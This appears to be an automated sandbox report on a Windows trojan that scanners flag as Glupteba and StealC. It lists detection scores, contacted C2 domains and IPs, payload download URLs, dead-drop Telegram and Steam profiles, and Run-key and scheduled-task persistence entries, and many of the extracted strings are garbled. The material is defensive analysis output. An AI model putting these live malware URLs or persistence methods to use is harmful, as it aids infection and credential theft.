                [Behavior graph. ID: 1373508; Sample: 9dfb6b41c90732c9206ef6f65a9...; Startdate: 12/01/2024; Architecture: WINDOWS; Score: 100]

                Source | Detection | Scanner | Label | Link
                9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe | 86% | ReversingLabs | Win32.Trojan.Glupteba |
                9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe | 78% | Virustotal |  | Browse
                9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe | 100% | Avira | HEUR/AGEN.1319085 |
                9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe | 100% | Joe Sandbox ML |  |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe | 100% | Joe Sandbox ML |  |
                C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe | 100% | Joe Sandbox ML |  |
                C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe | 79% | ReversingLabs | Win32.Trojan.StealC |
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe | 79% | ReversingLabs | Win32.Trojan.StealC |
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlite3[1].dll | 0% | ReversingLabs |  |
                C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe | 86% | ReversingLabs | Win32.Trojan.Glupteba |

                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                zexeq.com | 21% | Virustotal |  | Browse
                brusuax.com | 19% | Virustotal |  | Browse

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                t.me | 149.154.167.99 | true | false |  | high
                api.2ip.ua | 172.67.139.220 | true | false |  | high
                zexeq.com | 175.120.254.9 | true | true |  | unknown
                brusuax.com | 186.147.159.149 | true | true |  | unknown

                Name | Malicious | Antivirus Detection | Reputation
                http://zexeq.com/test1/get.php | true | 20%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                http://brusuax.com/dl/build2.exe | true | 25%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                http://zexeq.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true | true | Avira URL Cloud: malware | unknown
                https://api.2ip.ua/geo.json | false |  | high
                              • Avira URL Cloud: safe
                              unknown
                              https://116.202.0.196:10220/sqlite3.dll_build2.exe, 00000005.00000003.1851563800.0000000003628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1870105733.0000000003628000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17lsass.exebuild2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpfalse
                                high
                                https://api.2ip.ua/k9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316287824.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362476595.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 
00000003.00000003.2310805053.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://116.202.0.196/tdole2.tlbHbuild2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.2ip.ua/m9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316287824.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362476595.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 
00000003.00000003.2310805053.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.reddit.com/9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1960956435.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      https://api.2ip.ua/geo.json-Agent:9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000003.1840539958.0000000000887000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842375819.0000000000889000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://steamcommunity.com/profiles/76561199601319247build2.exe, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                          high
                                          https://api.2ip.ua/geo.jsonX9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://116.202.0.196:10220/(non)Standardbuild2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://steamcommunity.com/profiles/76561199601319247helloWFQY12O5J6Nr.$vbuild2.exe, 00000004.00000002.1746811834.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                              high
                                              https://api.2ip.ua/d9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921649273.0000000000B79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://116.202.0.196:10220/mozglue.dlltwarebuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://api.2ip.ua/geo.jsonv0z9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://116.202.0.196:10220/vcruntime140.dllbuild2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://api.2ip.ua/i9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000003.1920870702.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921733753.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000003.1920210530.0000000000B89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.2ip.ua/geo.jsonl9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921649273.0000000000B39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.2ip.ua/P9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 0000000A.00000002.1921649273.0000000000B79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1885029098.000000000993F000.00000004.00000020.00020000.00000000.sdmp, CFIJEBFC.5.drfalse
                                                          high
                                                          https://api.2ip.ua/geo.jsone9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://zexeq.com/files/1/build3.exe$rune9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2368057315.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 
9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360968944.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • 17%, Virustotal, Browse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://t.me/bg3gotymedvsMozilla/5.0build2.exe, 00000004.00000002.1746811834.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              high
                                                              https://116.202.0.196:10220/nss3.dllbuild2.exe, 00000005.00000002.2909501585.0000000003628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.youtube.com/9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1961052135.0000000003710000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                https://116.202.0.196:10220/Microsoftbuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://116.202.0.196:10220/llbuild2.exe, 00000005.00000002.2908682393.0000000003127000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848136191.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://api.2ip.ua/geo.jsonN9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.2ip.ua/29dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1680457736.0000000000A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesCFIJEBFC.5.drfalse
                                                                      high
                                                                      https://116.202.0.196:10220/sqlite3.dll.build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851494817.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851284140.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://116.202.0.196/build2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://116.202.0.196:10220/.0.196:10220/Chedotbuild2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://116.202.0.196:10220/build2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1869958734.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://116.202.0.196:10220ngbuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      low
                                                                      https://web.telegram.orgbuild2.exe, 00000005.00000003.1757407833.0000000000715000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://116.202.0.196/nbuild2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851494817.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1851284140.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016strybuild2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://116.202.0.196:10220/vcruntime140.dllalbuild2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://116.202.0.196:10220/msvcp140.dllsJH8build2.exe, 00000005.00000002.2908682393.0000000003127000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848136191.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.amazon.com/9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1960766095.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1885029098.000000000993F000.00000004.00000020.00020000.00000000.sdmp, CFIJEBFC.5.drfalse
                                                                              high
                                                                              http://zexeq.com/files/1/build3.exe$run9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • URL Reputation: malware
                                                                              unknown
                                                                              https://116.202.0.196:10220nuxbuild2.exe, 00000005.00000002.2903117606.000000000049F000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              low
                                                                              https://t.me/bg3gotyHbuild2.exe, 00000005.00000003.1761763513.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.twitter.com/9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1960992535.0000000003710000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.openssl.org/support/faq.html9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exefalse
                                                                                    high
                                                                                    http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exefalse
                                                                                    • Avira URL Cloud: safe
                                                                                    low
                                                                                    https://t.me/Xbuild2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.139.220 | api.2ip.ua | United States | 13335 | CLOUDFLARENETUS | false
116.202.0.196 | unknown | Germany | 24940 | HETZNER-ASDE | false
186.147.159.149 | brusuax.com | Colombia | 10620 | TelmexColombiaSACO | true
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
175.120.254.9 | zexeq.com | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
                                                                                                              Joe Sandbox version:38.0.0 Ammolite
                                                                                                              Analysis ID:1373508
                                                                                                              Start date and time:2024-01-12 06:47:05 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 11m 13s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:13
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.rans.spre.troj.spyw.evad.winEXE@12/1265@8/5
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 99%
                                                                                                              • Number of executed functions: 100
                                                                                                              • Number of non-executed functions: 223
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 72.21.81.240
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadFile calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                              • Report size getting too big, too many NtWriteFile calls found.
Time | Type | Description
05:47:55 | Task Scheduler | Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe s>--Task
05:47:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --AutoStart
05:48:08 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --AutoStart
